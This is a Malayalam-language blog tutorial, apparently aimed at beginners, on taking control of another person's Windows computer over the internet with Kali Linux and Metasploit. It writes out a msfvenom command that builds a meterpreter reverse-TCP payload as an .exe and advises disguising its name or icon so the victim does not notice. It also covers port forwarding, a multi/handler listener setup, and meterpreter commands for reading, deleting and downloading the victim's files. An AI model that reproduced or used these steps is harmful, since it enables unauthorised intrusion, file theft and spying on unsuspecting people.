എല്ലാവർക്കും ഒരിക്കലെങ്കിലും ഈ ചിന്ത മനസിലൂടെ കടന്നു പോയിട്ടുണ്ടാവില്ലേ..എങ്ങനെ ഇന്റർനെറ്റ് വഴി മറ്റൊരാളുടെ കമ്പ്യൂട്ടർ ഹാക്ക് ചെയ്യാം എന്ന്..ഇതാ അതിനുള്ള ഉത്തരം...
Kali linux എന്ന os ആണ് നമ്മൾ ഇതിനായി ഉപയോഗിക്കുന്നത്..kali linux എങ്ങനെ install ചെയ്യാം എന്ന് ഞാൻ മുൻപ് വിശദീകരിച്ചിരുന്നു അതറിയാൻ ഈ ലിങ്കിൽ ക്ലിക്ക് ചെയ്യുക how to install kali linux.ഇനി നമുക്ക് tutorial നോക്കാം.
നമ്മൾ അറിഞ്ഞിരിക്കേണ്ട കാര്യങ്ങൾ:-
1)നമ്മുടെ public ip
ഒരു സിസ്റ്റത്തിനു local ip യും public ip യും ഉണ്ടായിരിക്കും..നമ്മൾക്ക് ഇവിടെ public ip ആണ് ആവശ്യം കാരണം ഇന്റർനെറ്റ് വഴി ആണ് നമ്മൾ pc കണ്ട്രോൾ ചെയ്യുന്നത്..public ip വഴിയാണ് നമ്മുടെ സിസ്റ്റം ഇന്റർനെറ്റിൽ എവിടെയാണെന്ന് കണ്ടുപിടിക്കുന്നത്..public ip അറിയാൻ.
canyouseeme.org എന്ന site ഓപ്പൺ ആകുക അതിൽ your ip എന്നതിന് നേരെ എഴുതിയുട്ടുള്ളതാണ് നിങ്ങളുടെ public ip.
2)router ന്റെ ip address
Port forwarding നു വേണ്ടി നമ്മൾ ഇതറിഞ്ഞിരിക്കണം..Port forwarding എന്താണെന്ന് ഈ tutorial ഇത് പിന്നീട് വിശദീകരിക്കുന്നതാണ്. Router ന്റെ ip അറിയാൻ
Kali linux ൽ terminal ഓപ്പൺ ആകുക എന്നിട്
route -n
എന്നു ടൈപ്പ് ചെയ്ത് എന്റർ ചെയ്യുക.
ഇപ്പോൾ കാണുന്ന ലിസ്റ്റിൽ gateway എന്നതിന് താഴെ ഫ്ലാഗ് Ug ആയ നമ്പർ നോക്കുക.അതായിരിക്കും നിങ്ങളുടെ router ip.. ഇവിടെ എന്റെ കാര്യത്തിൽ 10.0.0.1 ആണ്..നിങ്ങളുടേത് ചിലപ്പോൾ 192.168.1.1 എന്നായിരിക്കും.
3)local ip
Local ip കണ്ടു പിടിക്കാൻ terminal ഓപ്പൺ ആക്കി അതിൽ
ifconfig
എന്നു ടൈപ്പ് ചെയ്ത് എന്റർ ചെയ്യുക..
അതിൽ നിങ്ങൾ ഏത് interface ഉപയോഗിച്ചാണ് കണക്ട് ചെയ്തതെന്ന് നോക്കുക ഞാൻ ethernet ആണ് ഉപയോഗിച്ചത് അതുകൊണ്ട് eth0 യിൽ inet എന്നതിന് നേരെ എഴുതിയത് എടുക്കുന്നു ivde അത് 10.0.0.13 ആണ്..പക്ഷെ ഞാൻ ഈ tutorial ൽ 10.0.0.2 ആണ് എടുക്കുന്നത്..(നിങ്ങൾ നിങ്ങളുടെ കിട്ടിയ ip തന്നെ ഉപയോഗിക്കുക)
നിങ്ങൾക് ചിലപ്പോൾ wlan0 എന്നതിൽ ആയിരിക്കും inet ഉണ്ടാകുക(wireless ആണ് ഉപയോഗിക്കുന്നതെങ്കിൽ)..
ഇനി നമുക്ക് tutorial തുടങ്ങാം.
Step 1)
Payload create ചെയ്യൽഇതിനായി terminal ഓപ്പൺ ആകുക.എന്നിട് താഴെ പറയുന്നയത് പോലെ command ടൈപ്പ് ചെയ്യുക.
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp -e generic/none -f exe LHOST=10.12.13.14 LPORT=4444 > /root/Desktop/hack.exe
എന്റർ ചെയ്യുക.
അപ്പോൾ hack.exe എന്നൊരു file deaktop ൽ create ചെയ്യപ്പെടും.
ഓർമിക്കേണ്ട കാര്യം എന്തെന്നാൽ LHOST ൽ 10.12.13.14 നു പകരം നിങ്ങളുടെ public ip ആണ് കൊടുക്കേണ്ടത്. LPORT നിങ്ങൾക് ഇഷ്ടം ഉള്ളത് കൊടുക്കാം.അതുപോലെ തന്നെ hack എന്നതിന് പകരം ഇഷ്ടം ഉള്ള പേരു നിങ്ങൾക് കൊടുക്കാം.
ഈ payload ഹാക്ക് ചെയ്യേണ്ട കംപ്യൂട്ടറിൽ സെന്റ് ചെയ്ത് കൊടുക്കുക.(name മാറ്റിയോ icon മാറ്റിയോ അവരറിയാതെ സെന്റ് ചെയ്യാം)
Step 2)
Port Forwardingഏത് port വഴിയാണ് നമ്മൾ create ചെയ്ത payload നമ്മുടെ സിസ്റ്റം access ചെയ്യുന്നതെന്ന് നമ്മൾ router ൽ set ചെയ്ത് കൊടുക്കണം..ഇതിനായി
നിങ്ങൾ കണ്ടുപിടിച്ച router ന്റെ ip browseർ ൽ address bar ൽ എന്റർ ചെയ്ത് ഓപ്പൺ ആകുക..അപ്പോൾ നിങ്ങൾക്ക് router ന്റെ login പേജ് കാണാം.(എല്ല router കൾക്കും ഒരേ പോലെ ആവില്ല ഈ പേജ് അതുപോലെ തന്നെ അതിന്റെ settings ഉം).
ഈ login പേജിൽ user name and password എന്റർ ചെയ്യാൻ പറയും.default ആയി username:admin എന്നും password: password(or admin എന്നും ആവാം) എന്നും ആയിരിക്കാം.. അതല്ലെങ്കിൽ നിങ്ങളുടെ router ന്റെ model വെച്ചു നെറ്റിൽ സെർച്ച് ചെയ്താൽ default user name ഉം password ഉം കിട്ടുന്നതായിരിക്കും..ഇനി നിങ്ങൾക് അറിയുമെങ്കിൽ അത് ടൈപ്പ് ചെയ്യുക.

അങ്ങിനെ login ചെയ്തതിനു ശേഷം
തുറന്നു വരുന്ന പേജിൽ port forwarding എന്ന ഓപ്ഷൻ കണ്ടെത്തണം.സാധാരണ advanced എന്ന option ക്ലിക്ക് ചെയ്താൽ അത് കാണാം..


*)service type ൽ tcp/udp കൊടുക്കുക.
*)അതിൽ server ip address ൽ നമ്മുടെ local ip കൊടുക്കുക.
*)start port ലും end port ലും നമ്മൾ മുമ്പ് ഉപയോഗിച്ച port നമ്പർ കൊടുക്കുക
Step 3)
Listener സ്റ്റാർട്ട് ചെയ്യൽഇതിനായി terminal ഓപ്പൺ ആകുക അതിൽ
msfconsole
എന്നു ടൈപ്പ് ചെയ്ത് എന്റർ ചെയ്യുക
അത് ലോഡ് ചെയ്തതിനു ശേഷം
use multi/handler
എന്നു ടൈപ്പ് ചെയ്ത് എന്റർ ചെയ്യുക.
എന്നിട് താഴെ കാണുന്ന commands ഓരോന്നായി ടൈപ്പ് ചെയ്ത് എന്റർ ചെയ്യുക.

●set PAYLOAD windows/meterpreter/reverse_tcp
●set LHOST 10.12.13.14
●set LPORT 4444
ഇവിടെ വീണ്ടും ശ്രദ്ധിക്കുക.LHOST നിങ്ങളുടെ public ip യും LPORT മുൻപ് കൊടുത്ത port ഉം ആണ്.
ഇതെല്ലാം എന്റർ ചെയ്ത് അവസാനം
exploit
എന്നു ടൈപ്പ് ചെയ്ത് എന്റർ ചെയ്യുക.
ഇപ്പോൾ നിങ്ങൾ listener സ്റ്റാർട്ട് ചെയ്തിരിക്കുന്നു..victim നിങ്ങളുടെ payload ഓപ്പൺ ആക്കിയാൽ നിങ്ങൾക് ഒരു meterpreter session കിട്ടും..അപ്പോൾ നിങ്ങൾ വിജയകരമായി ഹാക്ക് ചെയ്തിരിക്കുന്നു.
ഇനി നിങ്ങൾക് വിവിധ command കൾ ഉപയോഗിച്ചു victim ന്റെ സിസ്റ്റത്തിൽ നിന്നും files ഡൌൺലോഡ് ചെയ്യുകയോ upload ചെയ്യുകയോ keystrock record ചെയ്യുകയോ എന്തു വേണെന്മ്കിലും ചെയ്യാം.
ചില commands താഴെ കൊടുക്കുന്നു
●cat - read and output to stdout the contents of a file
●cd - change directory on the victim
●del - delete a file on the victim
●download - download a file from the victim system to the attacker system
Enjoy...
No comments:
Write comments